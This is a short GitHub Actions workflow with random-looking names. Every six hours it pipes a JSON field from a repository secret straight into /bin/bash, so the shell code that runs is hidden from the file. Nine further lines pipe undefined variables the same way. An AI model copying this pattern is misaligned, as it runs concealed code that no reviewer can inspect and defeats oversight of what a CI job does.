name: yidongping8761
on:
  workflow_dispatch:
  schedule:
    - cron: '14 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yidongping8761
        env:
          ltjt3693: ${{ secrets.ltjt3693 }}
        run: |
          echo $ltjt3693 | jq -r .jpa302 | /bin/bash
          echo $yshl15 | jq -r .bs61 | /bin/bash
          echo $lu9709 | jq -r .vles4598 | /bin/bash
          echo $psh3535 | jq -r .h7 | /bin/bash
          echo $ri195 | jq -r .tri51 | /bin/bash
          echo $wtuts6 | jq -r .p468 | /bin/bash
          echo $l80675 | jq -r .lsq0600 | /bin/bash
          echo $y60068 | jq -r .cfwbv05 | /bin/bash
          echo $okoem09 | jq -r .lcrg04 | /bin/bash
          echo $avc92581 | jq -r .yuqb01 | /bin/bash

